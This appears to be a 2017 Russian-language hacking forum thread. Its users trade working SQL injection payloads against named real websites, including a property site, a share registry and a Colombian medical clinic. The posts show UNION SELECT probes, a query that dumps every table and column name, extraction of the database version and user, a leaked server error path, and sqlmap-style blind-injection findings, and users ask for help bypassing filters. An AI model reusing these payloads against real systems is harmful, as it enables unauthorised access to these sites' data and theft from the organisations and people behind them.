28.06.2017, 20:47
|
|
Познающий
Регистрация: 23.06.2013
Сообщений: 31
С нами:
6783446
Репутация:
0
|
|
Код:
view-source:http://www.nesprosta.ru/?type=content&id=29'
Код HTML:
База данных квартир: купить квартиру в Москве, снять квартиру (Москва), цены на квартиры, объявления недвижимость - Nesprosta.ru
Код:
http://www.trest14perm.ru/newbuildings/?show_id=37+and+1=10+uNion+all+select+1,2,3,4,5,6,7--
Код HTML:
SQL Error: The used SELECT statements have a different number of columns at /home/trest14prm/trest14perm.ru/docs/wbk-cms/module/objects.php line 47
Array
(
[code] => 1222
[message] => The used SELECT statements have a different number of columns
[query] => SELECT DISTINCT * FROM geocard,geomarks WHERE act=1 and geocard.type=geomarks.id and obj1=37 and 1=10 uNion all select 1,2,3,4,5,6,7-- GROUP BY type
[context] => /home/trest14prm/trest14perm.ru/docs/wbk-cms/module/objects.php line 47
)
Код:
http://kras-city.ru/info_krsnr.php?num=1%27+union+all+select+1,2,3,4,5,6,7,8,9,10,(select(@)from(select(@:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@:=concat(@,0x3c6c693e,table_schema,0x2e,table_name,0x3a,column_name))))a),12--+[
Это как обойти?
Код:
http://www.meatbranch.com/advert/magazine.html'+and+'1'='1
Код:
http://www.teplopoint.ru/'--+[
Код:
http://www.zorginox.ru/sobitiya/504/'%20and%20'1'='1
|
|
|
06.07.2017, 06:18
|
|
Познающий
Регистрация: 23.06.2013
Сообщений: 31
С нами:
6783446
Репутация:
0
|
|
Код:
http://an-tarusa.ru/View.aspx?id=-1 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14
все равно не знаю, что с этим Jet Database делать |
|
|
|
04.08.2017, 11:35
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
С нами:
9650336
Репутация:
662
|
|
|
|
|
|
06.08.2017, 12:37
|
|
Новичок
Регистрация: 25.04.2010
Сообщений: 0
С нами:
8445343
Репутация:
0
|
|
АО «Сибирский реестр»
Код:
http://www.sibreg.ru/doc.php?id=-13827+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10--&menu=about
|
|
|
|
06.08.2017, 12:54
|
|
Новичок
Регистрация: 25.04.2010
Сообщений: 0
С нами:
8445343
Репутация:
0
|
|
Clínica Medilaser Neiva
Код:
http://www.clinicamedilaser.com.co/branch.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5--
|
|
|
|
11.08.2017, 10:10
|
|
Новичок
Регистрация: 30.08.2013
Сообщений: 20
С нами:
6685526
Репутация:
0
|
|
Код:
http://www.kupa.pl/pl/humor.php?id=16
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=16 AND 1103=1103
Type: AND/OR time-based blind
Title: MySQL |
|
|
|
11.08.2017, 10:36
|
|
Новичок
Регистрация: 30.08.2013
Сообщений: 20
С нами:
6685526
Репутация:
0
|
|
|
|
|
|
11.08.2017, 11:36
|
|
Новичок
Регистрация: 30.08.2013
Сообщений: 20
С нами:
6685526
Репутация:
0
|
|
Код:
http://adamslove.org/en-d.php?id=85
(GET)
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=85' AND 1057=1057 AND 'wZNL'='wZNL |
|
|
|
11.08.2017, 12:10
|
|
Участник форума
Регистрация: 20.04.2016
Сообщений: 185
С нами:
5297366
Репутация:
47
|
|
Сообщение от SlipX
↑
Код:
http://adamslove.org/en-d.php?id=85
(GET)
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=85' AND 1057=1057 AND 'wZNL'='wZNL
Ну и кому это нужно?
|
|
|
|
11.08.2017, 12:14
|
|
Новичок
Регистрация: 30.08.2013
Сообщений: 20
С нами:
6685526
Репутация:
0
|
|
не смог докрутить, blind
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
